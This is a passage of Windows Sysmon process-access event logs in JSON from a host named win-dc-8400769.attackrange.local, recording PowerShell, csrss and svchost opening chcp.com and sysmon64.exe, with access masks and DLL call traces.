ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f3ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f3a127(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","SourceProcessId":"872","SourceThreadId":"5096","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010C3260800}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ab2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f542fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f3ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f3a127(wow64)","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5557,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010C3260800}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010C3260800}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5558,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5559,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5560,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5561,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5562,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5563,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
